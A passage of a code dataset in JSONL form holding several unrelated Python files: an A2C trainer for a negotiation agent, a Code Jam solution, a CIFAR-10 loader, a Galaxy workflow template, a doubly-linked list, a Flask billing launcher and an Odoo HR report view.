batch.desc_inputs.shape))\n # batch.mask_last_price()\n value, policy, price, pvar = self._run_batch_a2c(batch)\n # print('train_policy is:', policy)\n if not batch.for_value:\n policy_loss, pl_stats = self._compute_loss(batch, policy=policy, price=(price, pvar), loss=self.train_loss)\n # print('policy_loss is:', policy_loss)\n policy_stats.update(pl_stats)\n\n entropy_loss, _ = self._compute_loss(batch, policy=policy, price=(price, pvar), loss=self.entropy_loss)\n\n # penalty = ((price-1)**2).mul((price>2).float()) + ((price-0)**2).mul((price<0.5).float())\n # penalty = ((price > 2).float()).mul((price - 1) ** 2) + ((price < 0.5).float()).mul((price - 0) ** 2)\n penalty = ((price > 2).float()).mul(0.1) + ((price < 0.5).float()).mul(0.1)\n penalty = torch.zeros_like(price, device=price.device)\n\n\n\n if not batch.for_value:\n penalties.append(penalty.view(-1))\n p_losses.append(policy_loss.view(-1))\n e_losses.append(entropy_loss.view(-1))\n values.append(value.view(-1))\n\n for_value = batch.for_value\n\n # print('allnll ', nll)\n rewards = [0] * len(values)\n rewards[-1] = torch.ones(1) * reward\n\n old_rewards = [0] * len(values)\n old_rewards[-1] = torch.ones(1) * reward\n for i in range(len(rewards) - 2, -1, -1):\n rewards[i] = torch.ones(1) * rewards[i]\n old_rewards[i] = old_rewards[i + 1] * discount\n\n for i in range(len(rewards) - 2, -1, -1):\n rewards[i] += (values[i + 1].cpu().item()) * discount\n\n # print(old_rewards)\n\n new_rewards = torch.cat(rewards)\n new_values = torch.cat(values)\n if for_value:\n old_rewards = torch.cat(old_rewards[:-1])\n rewards = torch.cat(rewards[:-1])\n values = torch.cat(values[:-1]) # (total_seq_len, batch_size)\n else:\n old_rewards = torch.cat(old_rewards)\n rewards = torch.cat(rewards)\n values = torch.cat(values) # (total_seq_len, batch_size)\n\n if self.cuda:\n new_rewards = new_rewards.cuda()\n new_values = new_values.cuda()\n old_rewards = old_rewards.cuda()\n rewards = rewards.cuda()\n values = values.cuda()\n\n\n value_loss, vl_stats = self._compute_loss(None, value=new_values, oracle=new_rewards, loss=self.critic_loss)\n # print('values', values, p_losses)\n old_p_losses = torch.cat(p_losses).view(rewards.shape)\n # p_losses = old_p_losses.mul(old_rewards).mean()\n # print('shapes', old_p_losses, old_rewards)\n # p_losses = old_p_losses.mul(old_rewards).mean()\n if self.model_type == 'reinforce':\n p_losses = old_p_losses.mul(old_rewards)\n else:\n p_losses = old_p_losses.mul(rewards - values.detach())\n e_losses = torch.cat(e_losses)\n regular = torch.cat(penalties)\n return p_losses, e_losses, value_loss, regular, (old_p_losses, policy_stats)\n\n def update_a2c(self, args, batch_iters, rewards, model, critic, discount=0.95, fix_policy=False, fix_value=False):\n p_losses, e_losses, value_loss, regular = None, None, None, None\n old_p_losses = None\n policy_stats = Statistics()\n for i, bi in enumerate(batch_iters):\n p,e,v,r, info = self._gradient_accumulation(bi, rewards[i], model, critic, discount)\n if p_losses is None:\n p_losses, e_losses, value_loss, regular = p,e,v,r\n old_p_losses = info[0]\n else:\n p_losses = torch.cat([p_losses, p], dim=-1)\n e_losses = torch.cat([e_losses, e], dim=-1)\n value_loss = torch.cat([value_loss, v], dim=-1)\n regular = torch.cat([regular, r], dim=-1)\n old_p_losses = torch.cat([old_p_losses, info[0]], dim=-1)\n policy_stats.update(info[1])\n\n # Update step\n p_losses = p_losses.mean()\n e_losses = e_losses.mean()\n value_loss = value_loss.mean()\n regular = regular.mean()\n\n # final_loss = p_losses - self.ent_coef * e_losses + self.val_coef * value_loss + self.p_reg_coef * regular\n # final_loss = p_losses + self.val_coef * value_loss\n final_loss = p_losses - self.ent_coef * e_losses + self.val_coef * value_loss + self.p_reg_coef * regular\n model_loss = p_losses - self.ent_coef * e_losses + self.p_reg_coef * regular\n critic_loss = self.val_coef * value_loss\n\n # print('all loss', final_loss, p_losses, e_losses, value_loss)\n assert not torch.isnan(final_loss)\n # final_loss.backward()\n # model_loss.backward()\n # critic_loss.backward()\n # nn.utils.clip_grad_norm(critic.parameters(), 1.)\n # nn.utils.clip_grad_norm(model.parameters(), 1.)\n # self.optim.step()\n\n # if not self.model_type == \"reinforce\":\n if not args.only_run:\n if not fix_value:\n critic.zero_grad()\n critic_loss.backward()\n nn.utils.clip_grad_norm_(critic.parameters(), 1.)\n self.optim['critic'].step()\n\n if not fix_policy:\n model.zero_grad()\n model_loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), 1.)\n self.optim['model'].step()\n\n return torch.cat([final_loss.view(-1), p_losses.view(-1), e_losses.view(-1),\n value_loss.view(-1),\n torch.ones(1, device=final_loss.device) * policy_stats.mean_loss(0),\n torch.ones(1, device=final_loss.device) * policy_stats.mean_loss(1),\n old_p_losses.mean().view(-1) ],).view(1,-1).cpu().data.numpy()\n\n def validate(self, args, valid_size, valid_critic=False, start=0, split='dev', exchange=None):\n rate = 0.5\n if exchange is not None:\n if exchange:\n rate = 1\n else:\n rate = 0\n self.model.eval()\n self.critic.eval()\n total_stats = RLStatistics()\n oppo_total_stats = RLStatistics()\n valid_size = min(valid_size, 200)\n # print('='*20, 'VALIDATION', '='*20)\n examples = []\n verbose_str = []\n for sid, scenario in enumerate(self.scenarios[split][start:start+valid_size]):\n controller = self._get_controller(scenario, split=split, rate=rate)\n controller.sessions[0].set_controller(controller)\n controller.sessions[1].set_controller(controller)\n example = controller.simulate(args.max_turns, verbose=args.verbose)\n session = controller.sessions[self.training_agent]\n reward = self.get_reward(example, session)\n rewards = [self.get_reward(example, controller.sessions[i]) for i in range(2)]\n stats = RLStatistics(reward=rewards[0], n_words=1)\n oppo_stats = RLStatistics(reward=rewards[1], n_words=1)\n total_stats.update(stats)\n oppo_total_stats.update(oppo_stats)\n examples.append(example)\n verbose_str.append(self.example_to_str(example, controller, rewards, sid+start))\n # print('='*20, 'END VALIDATION', '='*20)\n self.model.train()\n self.critic.train()\n return [total_stats, oppo_total_stats], examples, verbose_str\n\n def save_best_checkpoint(self, checkpoint, opt, valid_stats):\n\n path = None\n if opt.model_type == 'reinforce' or opt.model_type == 'a2c':\n if self.best_valid_reward is None or valid_stats.mean_reward() > self.best_valid_reward:\n self.best_valid_reward = valid_stats.mean_reward()\n path = '{root}/{model}_best.pt'.format(\n root=opt.model_path,\n model=opt.model_filename)\n elif opt.model_type == 'critic':\n if self.best_valid_loss is None or valid_stats.mean_loss() < self.best_valid_loss:\n self.best_valid_loss = valid_stats.mean_loss()\n path = '{root}/{model}_best.pt'.format(\n root=opt.model_path,\n model=opt.model_filename)\n\n if path is not None:\n print('Save best checkpoint {path}'.format(path=path))\n torch.save(checkpoint, path)\n\n def checkpoint_path(self, episode, opt, stats):\n path=None\n if opt.model_type == 'reinforce' or opt.model_type == 'a2c' or opt.model_type == 'tom':\n path = '{root}/{model}_reward{reward:.2f}_e{episode:d}.pt'.format(\n root=opt.model_path,\n model=opt.model_filename,\n reward=stats.mean_reward(),\n episode=episode)\n elif opt.model_type == 'critic':\n path = '{root}/{model}_loss{reward:.4f}_e{episode:d}.pt'.format(\n root=opt.model_path,\n model=opt.model_filename,\n reward=stats.mean_loss(),\n episode=episode)\n assert path is not None\n return path\n\n def update_opponent(self, type=None):\n if type is None:\n types = ['policy', 'critic']\n elif not isinstance(type, list):\n types = [type]\n else:\n types = type\n\n print('update opponent model for {}.'.format(types))\n if 'policy' in types:\n tmp_model_dict = self.agents[self.training_agent].env.model.state_dict()\n self.agents[self.training_agent^1].env.model.load_state_dict(tmp_model_dict)\n if 'critic' in types:\n tmp_model_dict = self.agents[self.training_agent].env.critic.state_dict()\n self.agents[self.training_agent^1].env.critic.load_state_dict(tmp_model_dict)\n\n def get_temperature(self, epoch, batch_size, args):\n if args.only_run or args.warmup_epochs == 0:\n return 1\n half = args.num_dialogues // batch_size / 2\n t_s, t_e = 0.3, 1\n i_s, i_e = 0, half\n return min(t_e, t_s + (t_e - t_s) * 1. * epoch / args.warmup_epochs)\n # return min(1., 1.*epoch/half)\n \n def example_to_text(self, exmaple):\n ret = []\n for i, e in enumerate(exmaple.events):\n if \"real_uttr\" in e.metadata.keys():\n ret.append(\"[{}: {}]\\t{}\\t{}\\t\\\"{}\\\"\".format(e.time, e.agent, e.action, e.data, e.metadata[\"real_uttr\"]))\n else:\n ret.append(\"[{}: {}]\\t{}\\t{}\".format(e.time, e.agent, e.action, e.data))\n return ret \n \n\n def example_to_str(self, example, controller, rewards, sid=None):\n verbose_str = []\n from core.price_tracker import PriceScaler\n if sid is not None:\n verbose_str.append('[Scenario id: {}]'.format(sid))\n for session_id, session in enumerate(controller.sessions):\n bottom, top = PriceScaler.get_price_range(session.kb)\n s = 'Agent[{}: {}], bottom ${}, top ${}'.format(session_id, session.kb.role, bottom, top)\n verbose_str.append(s)\n verbose_str.append(\"They are negotiating for \"+session.kb.facts['item']['Category'])\n\n strs = self.example_to_text(example)\n for str in strs:\n verbose_str.append(str)\n s = \"reward: [0]{}\\nreward: [1]{}\".format(rewards[0], rewards[1])\n verbose_str.append(s)\n return verbose_str\n\n def sample_data(self, i, batch_size, args, real_batch=None):\n if real_batch is None:\n real_batch = batch_size\n rewards = [0]*2\n s_rewards = [0]*2\n _batch_iters = []\n _rewards = [[], []]\n examples = []\n verbose_strs = []\n for j in range(real_batch):\n # Rollout\n scenario, sid = self._get_scenario()\n controller = self._get_controller(scenario, split='train')\n controller.sessions[0].set_controller(controller)\n controller.sessions[1].set_controller(controller)\n example = controller.simulate(args.max_turns, verbose=args.verbose, temperature=self.get_temperature(i, batch_size, args))\n\n for session_id, session in enumerate(controller.sessions):\n # if args.only_run != True and session_id != self.training_agent:\n # continue\n # Compute reward\n reward = self.get_reward(example, session)\n # Standardize the reward\n all_rewards = self.all_rewards[session_id]\n all_rewards.append(reward)\n s_reward = (reward - np.mean(all_rewards)) / max(1e-4, np.std(all_rewards))\n\n rewards[session_id] = reward\n s_rewards[session_id] = s_reward\n _rewards[session_id].append(reward)\n\n for session_id, session in enumerate(controller.sessions):\n # Only train one agent\n if session_id != self.training_agent:\n continue\n\n batch_iter = session.iter_batches()\n T = next(batch_iter)\n _batch_iters.append(list(batch_iter))\n\n\n # if train_policy or args.model_type == 'tom':\n\n examples.append(example)\n verbose_str = self.example_to_str(example, controller, rewards, sid)\n\n if args.verbose:\n for s in verbose_str:\n print(s)\n verbose_strs.append(verbose_str)\n\n return _batch_iters, _rewards, examples, verbose_strs\n\n def learn(self, args):\n rewards = [None]*2\n s_rewards = [None]*2\n\n critic_report_stats = RLStatistics()\n critic_stats = RLStatistics()\n last_time = time.time()\n\n tensorboard_every = 1\n save_every = 100\n\n history_train_losses = [[],[]]\n\n batch_size = 100\n\n pretrain_rounds = 3\n if args.only_run:\n batch_size = 1\n pretrain_rounds = 0\n\n save_every = max(1, save_every // batch_size)\n report_every = max(1, args.report_every // batch_size)\n\n for i in range(args.num_dialogues // batch_size):\n _batch_iters, _rewards, example, train_ex_str = self.sample_data(i, batch_size, args)\n # print('reward is:', _rewards)\n # print(np.mean(_rewards[0]), np.mean(_rewards[1]))\n # print(np.mean(self.all_rewards[0][-tensorboard_every*batch_size:]), np.mean(self.all_rewards[1][-tensorboard_every*batch_size:]))\n\n path_txt = '{root}/{model}_example{epoch}.txt'.format(\n root=args.model_path,\n model=args.name,\n epoch=i)\n with open(path_txt, 'w') as f:\n for ex in train_ex_str:\n f.write('-' * 7 + '\\n')\n for s in ex:\n f.write(s + '\\n')\n\n # if train_policy:\n # self.update(batch_iter, reward, self.model, discount=args.discount_factor)\n #\n # if train_critic:\n # stats = self.update_critic(batch_iter, reward, self.critic, discount=args.discount_factor)\n # critic_report_stats.update(stats)\n # critic_stats.update(stats)\n k = -1\n for k in range(pretrain_rounds):\n loss = self.update_a2c(args, _batch_iters, _rewards[self.training_agent], self.model, self.critic,\n discount=args.discount_factor, fix_policy=True)\n # if (k+1)%5 == 0:\n # _batch_iters, _rewards, example, _ = self.sample_data(i, batch_size, args)\n # if loss[0,3].item() < 0.2:\n # break\n if k >=0:\n print('Pretrained value function for {} rounds, and the final loss is {}.'.format(k+1, loss[0,3].item()))\n # if loss[0, 3].item() >= 0.3:\n # print('Try to initialize critic parameters.')\n # for p in self.critic.parameters():\n # p.data.uniform_(-args.param_init, args.param_init)\n # for k in range(20):\n # loss = self.update_a2c(args, _batch_iters, _rewards, self.model, self.critic,\n # discount=args.discount_factor, fix_policy=True)\n # if (k + 1) % 5 == 0:\n # _batch_iters, _rewards, controller, example = self.sample_data(i, batch_size, args)\n # if loss[0, 3].item() < 0.2:\n # break\n # print('Pretrained value function for {} rounds, and the final loss is {}.'.format(k + 1,\n # loss[0, 3].item()))\n loss = self.update_a2c(args, _batch_iters, _rewards[self.training_agent], self.model, self.critic,\n discount=args.discount_factor)\n for k in range(pretrain_rounds):\n loss = self.update_a2c(args, _batch_iters, _rewards[self.training_agent], self.model, self.critic,\n discount=args.discount_factor, fix_policy=True)\n history_train_losses[self.training_agent].append(loss)\n\n # print('verbose: ', args.verbose)\n\n # print(\"Standard reward: [0]{} [1]{}\".format(s_rewards[0], s_rewards[1]))\n\n # Save logs on tensorboard\n if (i + 1) % tensorboard_every == 0:\n ii = (i+1)*batch_size\n for j in range(2):\n self.writer.add_scalar('agent{}/reward'.format(j), np.mean(self.all_rewards[j][-tensorboard_every*batch_size:]), ii)\n if len(history_train_losses[j]) >= tensorboard_every*batch_size:\n tmp = np.concatenate(history_train_losses[j][-tensorboard_every*batch_size:], axis=0)\n tmp = np.mean(tmp, axis=0)\n self.writer.add_scalar('agent{}/total_loss'.format(j), tmp[0], ii)\n self.writer.add_scalar('agent{}/policy_loss'.format(j), tmp[1], ii)\n self.writer.add_scalar('agent{}/entropy_loss'.format(j), tmp[2], ii)\n self.writer.add_scalar('agent{}/value_loss'.format(j), tmp[3], ii)\n self.writer.add_scalar('agent{}/intent_loss'.format(j), tmp[4], ii)\n self.writer.add_scalar('agent{}/price_loss'.format(j), tmp[5], ii)\n self.writer.add_scalar('agent{}/logp_loss'.format(j), tmp[6], ii)\n\n\n if ((i + 1) % report_every) == 0:\n import seaborn as sns\n import matplotlib.pyplot as plt\n if args.histogram:\n sns.set_style('darkgrid')\n\n # if train_policy:\n for j in range(2):\n print('agent={}'.format(j), end=' ')\n print('step:', i, end=' ')\n print('reward:', rewards[j], end=' ')\n print('scaled reward:', s_rewards[j], end=' ')\n print('mean reward:', np.mean(self.all_rewards[j][-args.report_every:]))\n if args.histogram:\n self.agents[j].env.dialogue_generator.get_policyHistogram()\n\n # if train_critic:\n # critic_report_stats.output(i+1, 0, 0, last_time)\n # critic_report_stats = RLStatistics()\n\n print('-'*10)\n if args.histogram:\n plt.show()\n\n last_time = time.time()\n\n # Save model\n if (i+1) % save_every == 0:\n # TODO: valid in dev set\n valid_stats, _, _ = self.validate(args, 50 if args.only_run else 200)\n valid_stats = valid_stats[0]\n if not args.only_run:\n self.drop_checkpoint(args, i+1, valid_stats, model_opt=self.agents[self.training_agent].env.model_args)\n if args.update_oppo:\n print('update oppo!')\n self.update_opponent(['policy', 'critic'])\n else:\n print('valid ', valid_stats.str_loss())\n\n # if train_policy:\n # valid_stats, _ = self.validate(args)\n # self.drop_checkpoint(args, i, valid_stats, model_opt=self.agents[self.training_agent].env.model_args)\n # self.update_opponent('policy')\n #\n # elif train_critic:\n # # TODO: reverse!\n # self.drop_checkpoint(args, i, critic_stats, model_opt=self.agents[self.training_agent].env.model_args)\n # critic_stats = RLStatistics()\n # else:\n # valid_stats, _ = self.validate(args)\n # print('valid result: ', valid_stats.str_loss())","sub_path":"craigslistbargain/neural/a2c_trainer.py","file_name":"a2c_trainer.py","file_ext":"py","file_size_in_byte":24978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"98034330","text":"import io\nimport sys\nimport collections\n\n# 2017 io for women https://code.google.com/codejam/contest/12224486/dashboard#s=p0&a=2\n# Simulate the redirect stdin.\nif len(sys.argv) > 1:\n filename = sys.argv[1]\n inp = ''.join(open(filename, \"r\").readlines())\n sys.stdin = io.StringIO(inp)\n\ndef guess(F,S, tickets):\n count = 0\n for i in range(1,S+1):\n h = {}\n for t in tickets:\n if t[0] == i:\n if t not in h:\n h[t] = True\n elif t[1] == i:\n if (t[1],t[0]) not in h:\n h[(t[1],t[0])] = True\n\n #print(h)\n count = max(count, len(h))\n return count\n\ndef main():\n t = int(input()) # read a line with a single integer\n for i in range(1, t + 1):\n [F,S] = [int(s) for s in input().split(\" \")]\n tickets=[]\n for j in range(F):\n [r,c] = [int(s) for s in input().split(\" \")]\n tickets.append( (r,c))\n \n #print(tickets)\n ans = guess(F,S, tickets)\n \n print(\"Case #{}: {}\".format(i, ans))\n \n\n\nif __name__ == \"__main__\":\n main()","sub_path":"jam/ticket_trouble.py","file_name":"ticket_trouble.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"539025907","text":"import matplotlib\r\n# For Mac OS\r\nmatplotlib.use('TkAgg')\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nclass dataInput:\r\n \r\n def __init__(self):\r\n self.trainData, self.testData = self.dataLoad()\r\n self.labelName = ['airplane',\r\n 'automobile',\r\n 'bird',\r\n 'cat',\r\n 'deer',\r\n 'dog',\r\n 'frog',\r\n 'horse',\r\n 'ship',\r\n 'truck']\r\n \r\n def dataLoad(self):\r\n \r\n data = []\r\n for i in range(5):\r\n dataFrame = self.unpickle('./data_set/cifar_10/data_batch_' + str(i+1))\r\n data.append(dataFrame)\r\n testData = self.unpickle('./data_set/cifar_10/test_batch' )\r\n \r\n return data, testData\r\n \r\n def unpickle(self,file):\r\n import pickle\r\n with open(file, 'rb') as fo:\r\n dict = pickle.load(fo, encoding='bytes')\r\n return dict \r\n \r\n def dataVisuallization(self, label):\r\n \r\n tmpDataIdx = [idx for idx, val in enumerate(self.testData[b'labels']) if val ==label]\r\n tmpData = self.testData[b'data'][tmpDataIdx[np.random.choice(len(tmpDataIdx))],:].reshape([3,32,32])\r\n plt.imshow(tmpData.transpose(1,2,0)) \r\n return tmpData\r\n\r\n def dataVisuallizationSubplot(self):\r\n for i in range(10):\r\n for q in range(10):\r\n plt.subplot(10,10,((i)*10) + (q+1) )\r\n self.dataVisuallization(q)\r\n if(i==0):\r\n plt.title(self.labelName[q])\r\n plt.show()\r\n \r\n\r\nif __name__ == '__main__':\r\n dataOb = dataInput()","sub_path":"dataInput.py","file_name":"dataInput.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"247112919","text":"##### HACKS ###\n#\n# - Package installs - Cheetah, bx-python\n# - Fake inputs\n# - Metadata\n# - Environment variables - TOOL_PATH, GALAXY_DATA_INDEX_DIR\n# - Patching sam_to_bam.py to avoid \"import galaxy\"\n#\n###############\n\n# @PACKAGE name:\"Cheetah\"\n# @PACKAGE name:\"bx-python\"\n\n# CONTAINER name:\"vernonm_galaxy_env_2\", dir_mapping:\"/nfs/data:/data\"\nfrom appsoma_galaxy import *\nfrom appsoma_api import *\nfrom pprint import pprint\n\nimport os, subprocess\n\nresource_pull('https://' + appsoma_api.environment_get_my_web_address()+\"/programs/$FULL_NAME\",\"workflow.ga\")\n\nTOOL_PATH = \"/galaxy/tools\"\nGALAXY_DATA_INDEX_DIR = \"/galaxy/tool-data\"\n\nif os.environ['MY_IP'].split('.')[0] != \"node-1\" and os.environ['MY_IP'].split('.')[0] != \"staging-node-1\":\n\timport vernonm_nygc_waldorf_only_paths\n\tpaths = vernonm_nygc_waldorf_only_paths.get_environment_paths()\n\n\tTOOL_PATH = paths['TOOL_PATH']\n\tGALAXY_DATA_INDEX_DIR = paths['GALAXY_DATA_INDEX_DIR']\n\nUSER_INPUTS = {\n\"1\":\n\t{\n\t\t\"ref_file\":{\"metadata\": {\"dbkey\": \"mm9\"}},\n\t\t\"GALAXY_DATA_INDEX_DIR\": GALAXY_DATA_INDEX_DIR\n\t}\n}\n\nMETADATA = {\n\"0\":\n\t{\n\t\t\"singlePaired.sInput1.ext\": \"fastqsanger\",\n\t\t\"refGenomeSource.ownFile.extension\": \"fasta\"\n\t}\n}\n\n\nSTYLES = \"\"\"\n\n\"\"\"\n\n\nwith open(\"workflow.ga\") as json_file:\n\tj = json.load(json_file)\n\tif 'code' in j:\n\t\tj = json.loads(j['code'])\n\t# Works on the workflow file and derives step information\n\td = compute_dependency_tree(j[\"steps\"])\n\td = sorted(d, key = lambda x: x[\"id\"])\n\t# Converts the tool xml to jsonforms\n\tp = process_galaxy_workflow(d, TOOL_PATH, USER_INPUTS, METADATA, STYLES)\n\t# See appsoma_api.py - This renders a html form from the json\n\t# definition and displays it in the run console\n\t#p = create_pipeline(d, TOOL_PATH, USER_INPUTS, METADATA)\n\tp.run()\n","sub_path":"programs/appsoma_galaxy_template.py","file_name":"appsoma_galaxy_template.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"605707524","text":"\"\"\" List (Doubly-Linked list) \"\"\"\n\nclass List:\n \"\"\"\n Doubly-Linked List implementation\n\n Attributes\n ----------\n head: Node\n Head Node\n\n tail: Node\n Tail Node\n\n size: int\n Number of elements in the list.\n\n Methods\n -------\n get_length()\n is_empty()\n insert(element)\n insert_back(element)\n insert_front(element)\n remove(element)\n remove_first()\n remove_last()\n search(element)\n contains(element)\n reverse()\n clear()\n get_first()\n get_last()\n get(index)\n index(element)\n copy()\n \"\"\"\n class Node:\n \"\"\"\n Node that contains the element.\n\n Attributes\n ----------\n element: element\n The key value the node holds.\n previous: Node\n A reference to the previous node in the list.\n next: Node\n A reference to the next node in the list.\n\n \"\"\"\n def __init__(self, element):\n \"\"\"\n Node constructor.\n\n Parameters\n ----------\n element: element\n The node element. \n \"\"\"\n self.element = element\n self.previous = None\n self.next = None\n\n def __init__(self):\n \"\"\"\n List constructor.\n \"\"\"\n self.head = None\n self.tail = None\n self.size = 0\n\n def __str__(self):\n \"\"\"\n Returns the string representation of the list.\n\n Traverses all the nodes, concatenating in each step the string\n representation of the element contained in the node.\n :return: The string representation.\n :rtype: string\n \"\"\"\n current_node = self.head\n list_string = \"[\"\n while current_node != None:\n list_string += str(current_node.element)\n current_node = current_node.next\n if current_node != None:\n list_string += \", \"\n list_string += \"]\"\n return list_string\n\n def __repr__(self):\n \"\"\"\n Returns the string representation of the list.\n\n :return: The string representation.\n :rtype: string\n \"\"\"\n return str(self)\n\n def get_length(self):\n \"\"\"\n Returns the number of elements in the list.\n\n :return: The size of the list.\n :rtype: int\n \"\"\"\n return self.size\n\n def is_empty(self):\n \"\"\"\n Checks whether or not the list has no elements.\n\n :return: True is it has no element; false otherwise.\n :rtype: boolean\n \"\"\"\n return self.head == None\n\n def insert(self, element):\n \"\"\"\n Inserts a new node in the list, with the element specified as parameter.\n\n :param element: The element to be inserted in the list.\n \"\"\"\n if element == None:\n return\n new_node = self.Node(element)\n if self.is_empty():\n self.head = new_node\n self.tail = new_node\n else:\n self.tail.next = new_node\n new_node.previous = self.tail\n self.tail = new_node\n self.size += 1\n\n def insert_back(self, element):\n \"\"\"\n Inserts the given element at the back of the list.\n\n :param element: The element to be inserted.\n \"\"\"\n self.insert(element)\n\n def insert_front(self, element):\n \"\"\"\n Inserts the given element at the front of the list.\n\n :param element: The element to be inserted.\n \"\"\"\n if element == None:\n return\n new_node = self.Node(element)\n if self.is_empty():\n self.head = new_node\n self.tail = new_node\n else:\n self.head.previous = new_node\n new_node.next = self.head\n self.head = new_node\n self.size += 1\n\n def remove(self, element):\n \"\"\"\n Deletes an element from the list. Decrements the size of the list after the operation.\n\n :param element: The element which we wish to remove.\n \"\"\"\n removed_node = self.search(element)\n if removed_node == None:\n return\n if self.head == self.tail:\n self.head = None\n self.tail = None\n elif self.head == removed_node:\n self.head = self.head.next\n self.head.previous = None\n elif self.tail == removed_node:\n self.tail = self.tail.previous\n self.tail.next = None\n else:\n removed_node.previous.next = removed_node.next\n removed_node.next.previous = removed_node.previous\n self.size -= 1\n\n def remove_first(self):\n \"\"\"\n Deletes the element that is held at the head of the list. Decrements the size of the list\n after the operation.\n\n :param element: The element which we wish to remove.\n \"\"\"\n if self.is_empty():\n return\n removed_element = self.head.element\n self.head = self.head.next\n if self.size == 1:\n self.tail = None\n else:\n self.head.previous = None\n self.size -= 1\n return removed_element\n\n def remove_last(self):\n \"\"\"\n Deletes the element that is held at the tail of the list. Decrements the size of the list\n after the operation.\n\n :param element: The element which we wish to remove.\n \"\"\"\n\n if self.is_empty():\n return\n removed_element = self.tail.element\n self.tail = self.tail.previous\n if self.size == 1:\n self.head = None\n else:\n self.tail.next = None\n self.size -= 1\n return removed_element\n\n def search(self, element):\n \"\"\"\n Traverses the list, looking for the specified element.\n\n :param element: The element we are looking for.\n :return: None if the element is not found; the element of the node otherwise.\n :rtype: element\n \"\"\"\n result = None\n current_node = self.head\n while current_node != None:\n if current_node.element is element:\n result = current_node\n break\n current_node = current_node.next\n return result.element\n\n def contains(self, element):\n \"\"\"\n Verifies the result of the search query with the given element as parameter.\n\n :param element: The element which we wish to verify is it is in the list.\n :return: True is the list contains the element in one of its nodes; False otherwise.\n :rtype: boolean\n \"\"\"\n return self.search(element) != None\n\n def reverse(self):\n \"\"\"\n Reverses the given list so that the elements at the back will now be at the front and\n viceversa.\n\n :return: The resulting list after the operation.\n :rtype: List\n \"\"\"\n reversed_list = List()\n current_node = self.head\n while current_node != None:\n reversed_list.insert_front(current_node.element)\n current_node = current_node.next\n return reversed_list\n\n def clear(self):\n \"\"\"\n Removes all the elements from the list.\n \"\"\"\n while self.size != 0:\n self.remove_last()\n\n def get_first(self):\n \"\"\"\n Returns the first element in the list.\n\n :return: The element held at the head of the list.\n :rtype: element\n \"\"\"\n if self.is_empty():\n return None\n return self.head.element\n\n def get_last(self):\n \"\"\"\n Returns the last element in the list.\n\n :return: The element held at the tail of the list.\n :rtype: element\n \"\"\"\n if self.is_empty():\n return None\n return self.tail.element\n\n def get(self, index):\n \"\"\"\n Returns the element that is held at the node at the given index in the list.\n\n :param index: The query index.\n :return: The element at the given position.\n :rype: element\n \"\"\"\n if index < 0 or index >= self.size:\n return None\n current_node = self.head\n count = 0\n while(count != index):\n current_node = current_node.next\n count += 1\n return current_node.element\n\n def index(self, element):\n \"\"\"\n Returns the index of the first occurence of the given element.\n\n :param element: The element whose index we are looking for.\n :return: The index of the element.\n :rtype: int\n \"\"\"\n current_node = self.head\n count = 0\n while current_node != None:\n if current_node.element is element:\n return count\n count += 1\n current_node = current_node.next\n return -1\n\n def copy(self):\n \"\"\"\n Copies a list.\n\n :return: A copy of the list.\n :rtype: List\n \"\"\"\n return self._copy_aux(List(), self.head)\n\n def _copy_aux(self, L, node):\n \"\"\"\n Auxiliary method for copying a list.\n\n :param L: The list in which the current list will be copied.\n :param node: The node to be inserted.\n :return: The list resulting from inserting the element to L.\n :rtype: List\n \"\"\"\n if node == None:\n return L\n else:\n L.insert_back(node.element)\n return self._copy_aux(L, node.next)","sub_path":"Python/Data Structures/Lists/List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":9619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"238980243","text":"import logging\n\nfrom flask_jwt_extended import JWTManager\nfrom flask_migrate import Migrate\nfrom flask_restful import Api\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom services.billings.billings_resource import *\n\n\n@app.after_request\ndef after_request(response):\n response.content_type = 'application/json; charset=UTF-8'\n response.content_language = 'ru-RU'\n return response\n\n\napp.config.from_object(Config)\ndb = SQLAlchemy(app)\n\nmigrate = Migrate(app, db)\napi = Api(app)\n\njwt = JWTManager(app)\n\napi.add_resource(BillingResource, '/billings/')\napi.add_resource(BillingCreateResource, '/billings')\napi.add_resource(BillingsTokenResource, '/billings/token')\n\nif __name__ == '__main__':\n file_log = logging.FileHandler(Config.BILLINGS_LOG_PATH)\n console_out = logging.StreamHandler()\n logging.basicConfig(handlers=(file_log, console_out),\n level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(message)s')\n app.run(debug=Config.DEBUG, port=Config.BILLINGS_PORT)\n","sub_path":"services/billings/billings_run.py","file_name":"billings_run.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"181465058","text":"__author__ = 'vampi'\nfrom openerp import tools\nfrom openerp.osv import fields, osv\n\nclass hr_employee_report(osv.Model):\n _name = \"hr.employee.report\"\n _description = \"Employee Statistics\"\n _auto = False\n _columns = {\n 'create_date': fields.datetime('Create Date', readonly=True),\n 'department_id': fields.many2one('hr.department', 'Department'),\n 'job_id': fields.many2one('hr.job', 'Job Title'),\n 'delay_date': fields.float('Delay to Start', digits=(16, 2), readonly=True),\n }\n _order = 'create_date desc'\n\n _depends = {\n 'hr.department': ['id', 'create_date'],\n 'hr.employee': ['create_date', 'job_id', 'department_id', 'id','parent_id'],\n }\n\n def init(self, cr):\n tools.drop_view_if_exists(cr, 'hr_employee_report')\n cr.execute(\"\"\"\n create or replace view hr_employee_report as (\n select\n min(l.id) as id,\n s.create_date as create_date,\n s.department_id,\n s.job_id\n from\n hr_department l\n LEFT JOIN\n hr_employee s on (s.department_id=l.id)\n GROUP BY\n s.create_date,\n s.job_id,\n s.department_id\n )\n \"\"\")\n","sub_path":"hr_report_custom/hr_employee_report.py","file_name":"hr_employee_report.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523159892","text":"\ndef 